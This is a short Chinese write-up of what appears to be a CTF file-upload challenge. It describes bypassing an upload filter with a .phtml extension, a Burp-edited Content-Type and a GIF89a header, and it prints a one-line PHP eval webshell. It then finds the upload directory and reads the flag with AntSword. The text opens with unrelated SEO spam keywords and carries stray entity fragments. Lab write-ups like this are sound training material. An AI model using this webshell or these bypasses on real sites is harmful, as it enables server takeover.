昆山外贸型网站制作,京东的网站建设,win7创建wordpress,如何把网站上线phtml格式绕过#xff0c;burp修改content-type绕过#xff0c;常见的文件上传存放目录名
题目就叫upload#xff0c;打开靶机 直接上传一个图片格式的一句话木马#xff0c;返回如下#xff1a; 提交练习5和9中的两种可以执行图片格式php代码的文件#xff0c;修改con…phtml格式绕过burp修改content-type绕过常见的文件上传存放目录名
题目就叫upload打开靶机 直接上传一个图片格式的一句话木马返回如下 提交练习5和9中的两种可以执行图片格式php代码的文件修改content-type为image/jpeg
同样提示不能上传image以外的格式。 在代码前加上gif文件头标识同时修改木马后缀为gif
上传成功
GIF89a?script languagephpeval($_POST[cmd]);/script但是这题返回值没有提示存放路径
手动查找可能的目录 在前端源码videos目录访问 于是逻辑推断存在images这个文件夹访问 啥也没有
然后一开始上传文件成功的页面叫upload_file.php 尝试uploads、upload 目录 访问 成功并找到我上传的木马文件 蚁剑连接
http://f9e21dca-f92d-48fc-8d7d-8571df923f06.node5.buuoj.cn/upload/muma.phtml 根目录拿到flag flag{d67b491d-4e6a-49f7-90b7-93f761b88aa1}
